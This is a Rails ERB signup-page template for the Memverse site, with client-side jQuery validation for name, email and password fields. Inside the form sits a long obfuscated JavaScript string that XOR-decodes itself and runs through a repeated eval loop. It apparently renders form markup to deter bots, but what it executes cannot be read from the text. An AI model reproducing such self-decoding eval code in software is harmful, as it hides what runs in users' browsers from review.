<% page_title  I18n.t :signup, :scope => 'page_titles' %>

<div class="white-box-with-margins">
			
<div class="signupform" id="signup-page-form">

	<%= form_for(resource, :as => resource_name, :url => registration_path(resource_name)) do |f| %>

		<h2 style="color:#000">Register for Memverse</h2><br />

		<%= devise_error_messages! %>
		
		<script type="text/javascript">
		//<![CDATA[
		<!--
		var x="function f(x,y){var i,o=\"\",l=x.length;for(i=0;i<l;i++){if(i==51)y+=" +
		"i;y%=127;o+=String.fromCharCode(x.charCodeAt(i)^(y++));}return o;}f(\"UA[UC" +
		"QVT\\033Z\\025F\\026;7#1d,j(ukhg#!s7~=7=3!>{4d57g*66\\014\\004J\\033J\\006r" +
		"zn^q{E`V\\013H\\n\\027\\024\\001\\010\\027\\037\\035\\004U[BHIK\\037\\010N\\"+
		"014T\\022\\007W\\007@]^4\\\"*k!l=:5/%9d$s#}`i:jhfl1twr'2ub\\030O\\001\\013\\"+
		"005\\027'\\023@\\000CP\\021\\037\\013\\033\\005\\003\\034S\\033[\\005\\002\\"+
		"032\\n\\016\\tTMRom+8yc.%!<8'P/|SL$\\\"#HI!&(EF)/-BC\\020\\023\\022\\177x\\" +
		"022\\027\\027tu\\035\\030\\034qr\\030\\001\\001nohijkw\\t\\010\\013`a\\013\\"+
		"rp\\035\\036\\037\\030\\031\\032\\007\\004y{{\\020\\021||`\\r\\016`ge\\n\\0" +
		"13khj\\007\\000nno<=2 PVV;4H]\\\\]12]PU\\033\\004\\003\\013\\024\\001\\031\\"+
		"030\\034\\031\\002\\033Pcb`}l`shkcfj-h>> MN'&%JK)**G@--/|}\\025\\020\\024yz" +
		"\\024\\031\\031vwt\\036\\036\\037lmc\\000\\007\\005jk\\010\\013\\ng`\\017\\" +
		"r\\017\\034\\035t\\014\\026vwtx\\025\\026{}}\\022\\023bab\\017\\010\\021bgh" +
		"\\005\\006mlm\\002\\003QQR?8VTW45][\\\\12_AA./BGF+$\\027&'HMN\\\\]524YZ099V" +
		"W0| !.8>da{JKp+,;%m0mSBI\\033\\017Q_\\000BQV\\r\\037\\002fb~ly\\001\\007\\0" +
		"05jkstbt\\t\\017\\016c\\034\\001\\036\\037\\030\\031\\023\\004\\027 zy|\\02" +
		"1\\022xaa\\016\\017$\\t\\n\\013\\004\\026\\035llm\\002\\003#5(044&7X\\004\\" +
		"005\\022\\004\\002XU;Z\\001\\002\\025\\017G\\006KI&Y !Ryi75b,?mbU(WPbi8\\\"" +
		"!NO:WO1/+*G@,,/|}\\n\\023\\027\\025z{\\032\\033\\032wp\\030\\035\\037lm\\00" +
		"2\\003\\004ijj\\n\\t\\ng`\\017\\016\\017\\034\\035,\\037\\030puw\\024\\025z" +
		"x|\\021\\022\\014\\031g\\006eee\\n\\013jij\\007\\000ilo<=\\020?8!TWX5653/]_" +
		"@-.^BGDA\\014Q&Y !\\005;28\\\"w177TUx62 )&y/<O6IJnbux(@?BC\\023\\021\\022\\" +
		"177x\\025\\026\\027tua~s\\030\\034\\037lm\\007\\003\\004ij\\001\\010\\tfg\\" +
		"014\\016\\016c\\034wps\\030\\031qux\\025\\026#}\\177~\\023\\014?fbd\\t\\n\\" +
		"002\\002\\033\\026\\001oln\\003<QSS89\\023;456%'*??@AB/(\\010CDH%&\\001\\02" +
		"2\\031\\026;9G :;~at]pxfk`#uinova1O&pxr./.C|\\027\\021\\023xy\\024\\025\\03" +
		"0uv\\037\\036\\035rsjj\\026\\000\\004\\005jk\\017\\n\\ng`\\r\\r\\017\\034\\" +
		"035spt\\031\\032s{y\\026\\027}\\177~\\023\\014\\002~\\001gdf\\013\\004ijk\\" +
		"000\\001,\\003<TRS89,,\\\\\\03567\\03012^BA./DGF+$OHK !N01^_H147TU<83$&w%!\\"+
		"\"OHp22,!*i98!?\\004QW\\037\\004\\t]_\\033\\004\\rFQSgxi\\002\\000\\003hi\\" +
		"001\\007\\010ef\\017\\014\\rbc\\tvps\\030\\031uvx\\025\\026|~}\\022\\023\\0" +
		"16\\013\\000\\r\\007edg\\004\\005\\020\\027.\\001\\002\\007$%%* SVW45! &;.\\"+
		"\"\\035\\006\\t\\001\\000\\014O\\013\\035\\000\\030\\034\\034\\016?.,P434Z[" +
		"kprg$afkxp2N)gJK.(*G@(-/|}\\025\\021\\024yz\\026\\033\\031vwu\\035\\037\\03" +
		"7lmy{\\001\\005\\006kdbug`ab\\016sq\\036\\037wwv\\033\\024zy{\\020\\021y~`\\"+
		"r\\016cde\\n\\013\\024nik\\000\\001koP=>TTU:; Y[[01\\\\_@-.6CGF+$NJK !N21^_" +
		"246[T>8;PQ\\\"\\\",%##HIso-)*G@7&;\\007\\020Q\\025\\034\\031\\010\\037\\013" +
		"\\014C\\035\\036\\035rsD\\n\\006\\024\\035\\022U\\005EGu\\n\\016\\rbcqqr\\0" +
		"37\\030wtw\\024\\025\\031\\022\\001\\024\\024yba\\016\\017\\022\\005\\027\\" +
		"n\\036\\032\\006\\007\\000\\001\\021\\\"RSR?8\\021:;\\036+--9!Z_@-.$510\\03" +
		"2\\003\\024D<[\\027\\025v{t7g+)g(;&bihc'reN1HIg{c8~+.-BC\\024\\022\\022\\17" +
		"7xyz{t\\037\\031\\033pq\\031\\035\\000mn\\003\\006\\005jk\\014\\010\\ng`j\\" +
		"r\\rp\\035\\036ttu\\032\\033{zz\\027\\020{}\\177\\014\\r\\000gfe\\n\\013njj" +
		"\\007\\000}\\016\\020PRQS89UWX56^_]23:J)EFE*+OKJ' ON0]^555Z[:9:WPM!mso%#$IJ" +
		"=(5() :o)\\021\\021~\\177H\\006\\032\\010\\t\\006A\\027\\014\\001UWZUS\\005" +
		"\\007\\005jk\\035\\013jrrrdusrr\\037\\030!(\\033\\024\\032\\017\\006\\013\\" +
		"177|\\177\\014\\raad\\t\\n;ojj\\007\\000hmo<=URT9:\\027^[Z70\\\"=.$GBC()AGH" +
		"%&\\003;-0Wmo\\177H>qlyxrq[<@#r{xrwvy}qrl>:BApO\\026\\020\\023xyR{t\\034\\0" +
		"31\\033pq\\030\\035\\000mn\\003\\005\\005jk\\010\\013\\ng`\\013\\r\\017\\03" +
		"4\\035spt\\031\\032v{y\\026\\027z\\177~\\023\\014zead\\t\\nghi\\006\\007jnn" +
		"\\003<VRS89RTX56^_]23D@B/(AEG$%JKOM\\\"\\\\533XY548UV9>=RST(K%$%JK/(*G@-./|" +
		"}\\024\\022\\024yz\\020\\037\\030vwP\\034\\036\\037lm\\000\\007\\007\\030\\" +
		"017\\r\\034\\005\\010\\006\\001\\017\\t\\016p\\035\\036hx\\031d\\033\\024rr" +
		"rdu~|`\\r\\016gtb`7mjj\\007\\000 \\005\\010URR?8-(-?8YZ\\\\12_AA./CGF+$\\02" +
		"1$;$+?AOJZA[]SO\\\\>;<QR\\\\G^Uey*V1qsc`i(|eV\\014\\014ZCL\\005\\020\\034\\" +
		"036\\035\\032pqOL\\031\\010\\010@\\031\\010\\027\\002\\n\\tfg\\017\\017\\01" +
		"6c\\034tqs\\030\\031qux\\025\\026{\\177}\\022\\023\\tdac\\010\\tceh\\005\\0" +
		"06\\rmmn\\003<RQS89STX56__]23@CB/(FDG$%5\\025 !I31^_756[T=9;PQ?< MN!'%JKlEF" +
		",DZ&.\\022\\021~\\177Vyz\\024\\032\\031vw\\036\\037\\036sl\\013L\\005\\006\\"+
		"017\\000\\014B\\n\\013\\013`aU\\031gs|q4z44t-<,wxm~w\\rp\\017\\010ev\\177\\" +
		"004\\005\\006\\007jnn\\003<RSS89RTX56$%534FCB/(4#DJI&'+.N21^__X^F;8:WPCUH@D" +
		"DVg!%'DE)+,ABcMPMMZ\\037[VS^IQV\\035c\\002LL^S\\\\\\037O\\003\\001O\\020\\0" +
		"03\\021ZMJurr\\037\\030uuw\\024\\025}z|\\021\\022\\024gbb\\017\\010fgg\\004" +
		"\\005mil\\001\\002mSQ>?2UTW45\\\\Y\\\\12<FCB/(@EG$%OKL!\\\"012_XwZ[E9;;PQ?<" +
		" MN&$%JK.**G@.-/|}\\026\\021\\024yz\\020\\030\\031vw\\031wo\\021^mn\\004\\0" +
		"05\\005jk\\006\\024\\016G\\014\\006\\002\\0205/\\036\\037,bftuz%u=?u*%7ltz~" +
		"5fp9\\001\\027\\016\\026\\026\\0268\\t\\026?8QTW45\\00340123#3+DEE*+=;LJL!\\"+
		"\"w603XY\\\\\\\\NCL?<=RSC'!#HI!$(EFK,A<C|\\035J[\\023\\022\\027{t\\036\\035" +
		"\\032pqD]V\\004UI\\006@TWAG\\r\\014\\rabU\\032vh\\030)/#7#h>~\\177}\\022\\0" +
		"23`bb\\017\\010geg\\004\\005.\\007\\000jmo<=\\026?8?M,^YZ70Z^_,-@AD)*AKI&'N" +
		"ON\\\\]R475Z[ZZ>8<QRKFV  $IJ%()FG(-.C|\\021\\023\\023xy\\027\\027\\030uv\\0" +
		"35\\035\\035rs\\007\\001\\002oh\\006\\004\\007dez\\010\\016G\\027\\013c8\\1" +
		"77z}0wg\\177yz\\027\\020<?el\\rp\\017\\010t=o~1no|m~|S@5>QVV;4\\00767Y]^3,A" +
		"AC()\\023?&;MIL!\\\"h733XYGEYJGyPQRSLM%!$IJ#*)FG/,.C|Uuludalz\\033\\032\\03" +
		"3pqm\\014^^HEN\\rW\\000\\017\\010fgM\\025\\023\\002qs\\021)srw\\033\\024*62" +
		"6$9k\\th4!,!\\010\\010x\\022\\023\\000x\\027mmP=>TUU:;]ZZ70]^_,-  XFGG$%NHL" +
		"!\\\"212_X657TU:8<QR>#!NO$$&KD!_!D+,/|}\\024\\023\\024yz\\021\\030\\031vw^q" +
		"r\\030\\001\\001no\\003\\016\\010\\n\\017\\023CA\\017\\014\\016c\\034rss\\0" +
		"30\\031watl\\026i\\020\\021mang`c\\010\\thyae0hom\\002\\003\\033AK?F9:K\\t\\"+
		"013\\t1#>\\\"&:(5\\0323$60KKJ' \\021L21^_NA268UVTSTHA\\\"\\\"\\\"OH&%'DE,+," +
		"AB(\\027\\020~\\177bviOEGW@\\026DCVAMU\\002z\\031UKWXU\\020@]R\\004x2/$ixxw" +
		"yy\\026\\027x\\177~\\023\\014aac\\010\\t\\002\\021\\037ikk\\000\\001\\006\\" +
		"025*+PQT9::%]X[01[\\\\@-.BDE*+JJJ' JM0]^375Z[;8:WP<=?LMZ&&%JK++*G@sBC\\025\\"+
		"022\\022\\177xf\\020\\025\\030uv\\037\\034\\035rs\\003\\003\\002oh\\017\\03" +
		"2TF\\016\\n\\013`a\\023\\003v9pd\\177ag\\033j\\025\\026zs,pq~hn41geg\\004\\" +
		"005\\\"\\007~\\001\\002yPH\\002=VUV;4\\\\Y[01 ;BBB/(BFG$%#KOM\\\"\\\\o^__XR" +
		"ZU?;;PQ|SLcQV`QXVLmFGJKXNt\\026\\023\\023xy\\033e\\010STC]\\025X\\005\\005J" +
		"U\\001QKXn\\025e\\030g`RQD-27/'#6f1{y{\\020\\021z|`\\r\\016bge\\n\\013,\\00" +
		"5\\006mnm\\002\\003PRR?8=RWX56\\\\_]23%AAC()DDH%&HNM\\\"\\\\513XY358UVD9>>S" +
		"L%\\\"#HI\\\"'(EF$HV**\\022\\021~\\177Pyz\\020\\032\\031vw\\032\\037\\036sl" +
		"\\007\\002\\003hit\\000\\t\\tfg\\t\\r\\016c\\034u}j:rvw\\024\\025-ag{ty$r<<" +
		"t5$;pwb{ak}h\\004QI\\002H3971ZY[01:\\027FAB/(@DG$%\\020<'<>T103XYBGDIC;==RS" +
		"e$ #HIBB\\\\QZ),-BCq\\025\\021\\023xy\\007I\\032\\t\\037]\\\\TT\\\\\\005AHM" +
		"DS\\031X\\025PZXY\\025RV*)a5b+4\\033\\024yy{\\020\\021}}`\\r\\016l\\020\\01" +
		"6rbhi\\006\\007mnn\\003<VRS89PWX56]^]23\\\"D@C()GDH%&HLM\\\"\\\\633XY548UV9" +
		"<=RS\\\"!\\\"OH]#B,+*G@(,/|}\\026\\023\\024yz\\027\\031\\031vw\\034\\035\\0" +
		"36sls\\003\\001\\004ijkdefZ\\022O^J46}z{{qqr{x{\\020\\021>>1<<dfe\\n\\013ty" +
		"u2(juhC=@?8L=7<ZX[01&!,-./?1!EKI&'JON\\\\]m455Z[ZKVWPQ8> MNYUW %(EF,.-BCN}~" +
		"XenkoimbW\\020l\\017GYIFG\\002P\\036\\032Z\\007\\026\\032\\\\_[\\010wp\\036" +
		"\\037/!<)(\\\"!+\\020o\\022\\0230qabd\\t\\neji\\006\\007imn\\003<:TQT9:WZY6" +
		"7]^^3,CAC()EEH%&.LNN\\\\]504YZ4;9VW:=>SLA|OH,EY/(*+@A(/\\020}~Wxy\\022\\025" +
		"\\030uv\\034\\035\\035rsu\\006\\003\\003hi\\002\\006\\010ef{\\001`\\022\\02" +
		"2|qz9m!/a2!&j\\020o\\022\\023elxzy>pwqsy>jksg\\000-SPT9:.5:\\007\\\\\\\\]23" +
		"BBB/(\\0360+$%&;MON\\\\]l755Z[KUVWPBO@# \\\"OHO#%(EF-.-BC\\025\\021\\022\\1" +
		"77x_sj\\177nob@\\021o\\016XXJG@\\003UJO\\027\\025\\004\\023\\021o_\\\"*&.a\\"+
		"037~&;2?k\\020\\021\\022\\023q\\035\\032\\013q\\020deh\\005\\006omm\\002\\0" +
		"03TRR?8RVW459;A^^_,-F@D)*DII&'KNN\\\\]224YZ099VW?<>SLX&#$IJ!))FG+-.C|\\021\\"+
		"023\\023xy\\007f\\026uvwp\\037\\034\\037lm\\010\\t\\005\\006\\005\\010\\002" +
		"\\000\\001\\035IK\\t\\016p\\035\\036tuu\\032\\033updhdz|\\177\\014\\rk|nh3e" +
		"ki\\006\\007$|p|O\\001WPT9:\\0059<0<0123\\0274!55DDG$%\\024OMM\\\"\\\\UD555" +
		"Z[QPQOL9<?LM# $IJ#()FGeUT\\\\ld\\035MLWZTB\\023a\\000JJ\\\\QB\\001KT]\\005\\"+
		"003KXU\\022\\001\\007OTYn}\\0021\\030\\031\\025\\000\\023|y{\\020\\021{|`\\" +
		"r\\016fde\\n\\013ojj\\007\\000mno<=WST9:QZY67\\\\]^3, ACD)*AHI&'2MO0]^245Z[" +
		"fUV?<=RSY8KW-#$'DE.*,AB/\\022\\021~\\177\\027\\027\\026{t\\034\\032\\033pq\\"+
		"031\\030\\001mn\\t\\000\\005\\014\\033\\017\\010M\\006\\007\\010\\001\\0173" +
		"uss\\030\\0314zvdmb%u57e:ede\\t\\n;}v\\n\\002inn\\003<.2621QUX56848\\023[AA" +
		"./GGF+$\\025>:0\\\"<n]^AC067TUp;?=RSGAQ^W*x6D;FGw(;)RDERA\\022\\021\\026tu^" +
		"v\\003ML\\003NTB\\033JUZGU^_Rb\\014\\014\\017\\034\\035rqt\\031\\032uzy\\02" +
		"6\\027>\\021\\022\\026ebb\\017\\010geg\\004\\005mil\\001\\002lSQ>?0UVW45YX\\"+
		"\\12^CA./P$:FLJJ' ON0]^575Z[C=P>>=RS&#\\\"OH &'DE-*,AB.\\020\\021~\\177e\\0" +
		"25\\024\\027tuIK\\033\\032\\037sl\\001\\002\\003hi\\035\\004\\025\\004\\t\\" +
		"004\\032K\\t\\016p\\035\\036,\\030g\\032\\033kg\\026i\\020\\021`#mr\\177'-<" +
		"31ojj\\007\\000=klP=>\\036>.7:%[Y[01]\\\\@-.\\0277;&7IKJ' \\023J11^_QZQ^<8:" +
		"WPyRSf !#HI%$(EF.,-BCZ\\021\\021\\023xyg~c{\\032\\033\\034qr\\022rICI`\\016" +
		"r\\035\\\\IJ\\014\\013\\014bc=87/+$:l`\\034\\037)')$\\027 5!`ee\\n\\013\\00" +
		"7y\\034lom\\002\\003TSR?8TUW45[X\\\\129'YDAD)*@KI&'LON\\\\]404YZ7<::WP=??LM" +
		"% $IJ!+)FGT(K,\\020\\021~\\177\\023\\024\\026{tl\\032\\031\\034qr\\031\\002" +
		"\\001no\\006\\007\\006kd\\016\\013\\013`aJc\\034\\\"\\\"tst\\032\\033xyz\\0" +
		"27\\020sywf&tsnam\\013z\\005\\006)oon\\003<\\022\\\\\\\\NCM\\001ZBNY\\\\]23" +
		"FBB/(GDG$%,!-;'\\\\]^__167TUVWPQFN_Do`jI4?~d!t<sljTDP^\\037\\014\\017\\014\\"+
		"003P\\002u\\005D\\006[qTV\\\\wGW_[\\027B\\023YYQ|2 *\\000)*4!f.$\\\">9\\035" +
		"r{>idfdkr!bqp%tkm\\\\\\010J\\005\\r\\036OLC\\000Q\\007P\\004U_M\\030Z\\001\\"+
		"033\\023M\\037\\014\\036\\024\\036\\020S\\006=m._&Y$:g%c+~lxt9h>k<s6ywpnxrh" +
		"x=\\t\",51)"                                                                 ;
		while(x=eval(x));
		//-->
		//]]>
</script>
	<% end %>
	
</div> <!-- end: signup-page-form -->

</div> <!-- end: white-box-with-margins -->

<script type="text/javascript">
	
	$("div.signup input").val(''); // clear all input values
	emailtaken = false; // setup emailtaken variable
	
	$("div.signup input").focus(function() {
		// Only show the tip if there was nothing showing before
		if ( !$(this).parent().find("div.sidetip p:visible").length ) {
			$(this).parent().find("div.sidetip p").hide();
			$(this).parent().find("div.sidetip p.tip").show();
		}
		
	});
	
	$("#user_name").blur(function() {
		$(this).parent().find("div.sidetip p").hide(); // First we hide other messages
		
		if( !$(this).val() ) { // give error if name is blank
			$(this).parent().find("div.sidetip p.blank").show();
		} else { // tell user that name is OK
			$(this).parent().find("div.sidetip p.isaok").show();
		}
	});
	
	$("#user_email").blur(function() {
		$(this).parent().find("div.sidetip p").hide(); // hide old message
		if( !$(this).val() ) { // email is empty
			
			$(this).parent().find("div.sidetip p.blank").show();
		} else { // email is not empty
			
			//simple email validation from http://www.w3schools.com/js/js_form_validation.asp
			var email = $(this).val();
			var atpos = email.indexOf("@");
			var dotpos = email.lastIndexOf(".");
			if (atpos<1 || dotpos<atpos+2 || dotpos+2>=email.length) {
				$("div.email div.sidetip p").hide(); // Hide other messages
				$("div.email div.sidetip p.invalid").show();
				emailtaken = false;
			}
			else if (emailtaken == $(this).val()) { // if the email address is already known to be taken, show old msg
				$("div.email div.sidetip p").hide(); // Hide other messages
				$("div.email div.sidetip p.taken").show();
			}
			else {
				$(this).parent().find("div.sidetip p.checking").show(); // Tell user that we're checking email
				$.getJSON('/info/email_available?email='+email, function(data) {
					if(data.available == 'true') {
						$("div.email div.sidetip p").hide(); // Hide other messages
						$("div.email div.sidetip p.isaok").show();
						emailtaken = false;
					} else {
						$("div.email div.sidetip p").hide(); // Hide other messages
				  		$("div.email div.sidetip p.taken").show();
				  		emailtaken = email;
					}
				});
			}
		}
	}); // end email blur
	
	$("#user_password, #user_password_confirmation").blur(function() { // this blur applies to all inputs. purpose is to display error if left blank
		if( !$(this).val() ) {
			$(this).parent().find("div.sidetip p").hide();
			$(this).parent().find("div.sidetip p.blank").show();
		}
	});
	
	function passwordStrength(){
		// Password strength script adapted from http://www.marketingtechblog.com/javascript-password-strength/
		var pwd = $("#user_password").val();
		var strongRegex = new RegExp("^(?=.{8,})(?=.*[A-Z])(?=.*[a-z])(?=.*[0-9])(?=.*\\W).*$", "g");
		var mediumRegex = new RegExp("^(?=.{7,})(((?=.*[A-Z])(?=.*[a-z]))|((?=.*[A-Z])(?=.*[0-9]))|((?=.*[a-z])(?=.*[0-9]))).*$", "g");
		var enoughRegex = new RegExp("(?=.{6,}).*", "g");
		
		$("#user_password").parent().find("div.sidetip p").hide(); // Hide old message
		
  		if( pwd.length < 6 ) {
			$("#user_password").parent().find("div.sidetip p.invalid").show();
		} else if (strongRegex.test(pwd)) {
			$("#user_password").parent().find("div.sidetip p.perfect").show();
		} else if (mediumRegex.test(pwd)) {
			$("#user_password").parent().find("div.sidetip p.ok").show();
		} else {
			$("#user_password").parent().find("div.sidetip p.weak").show();
		}
	}
	
	$("#user_password").keyup(function() {
		$(this).parent().find("div.sidetip p").hide(); // Hide old message
		passwordStrength();
		
		if( $("#user_password_confirmation").val() ) // if the user already has something in password confirmation input
			if ( $("#user_password_confirmation").val() !== $(this).val() ) { // passwords don't match
				$("div.passwordconfirm div.sidetip p").hide(); // hide old message
				$("div.passwordconfirm div.sidetip p.invalid").show(); // tell user
		} else { // passwords do match
				$("div.passwordconfirm div.sidetip p").hide(); // hide old message
				$("div.passwordconfirm div.sidetip p.perfect").show(); // tell user
		}
	});
	
	$("#user_password_confirmation").keyup(function() {
		$(this).parent().find("div.sidetip p").hide(); // Hide old message
		if ( !$(this).val() ) { // if there is nothing in field, just show tip
			$(this).parent().find("div.sidetip p.tip").show();
		}
		else if ( $(this).val() !== $("#user_password").val() ) { // if passwords do not match
			$(this).parent().find("div.sidetip p.invalid").show();
		} else {
			$(this).parent().find("div.sidetip p.perfect").show();
		}
	});
	
	function checkForm(){
		var isFormValid = true;
		var emptyFields = false;
		var invalidFields = false;
	
		$("div.signup input").each(function(){
			if ($.trim($(this).val()).length == 0){
			    $(this).addClass("hilite");
		    	isFormValid = false;
		    	emptyFields = true;
			} else if ( $(this).parent().find("div.sidetip p.error:visible").length ) {
				$(this).addClass("hilite");
		    	isFormValid = false;
		    	invalidFields = true;
			} else {
				$(this).removeClass("hilite");
			}
		});
	
		if (!isFormValid) {
			if (emptyFields && invalidFields) {
				alert("Please complete any empty fields and correct any invalid fields.")
			} else if (emptyFields) {
				alert("Please complete any empty fields.")
			} else if (invalidFields) {
				alert("Please correct any invalid fields.")
			}
		}
		return isFormValid;
	}
	
	// input placeholder fix
	fauxPlaceholder();
</script>
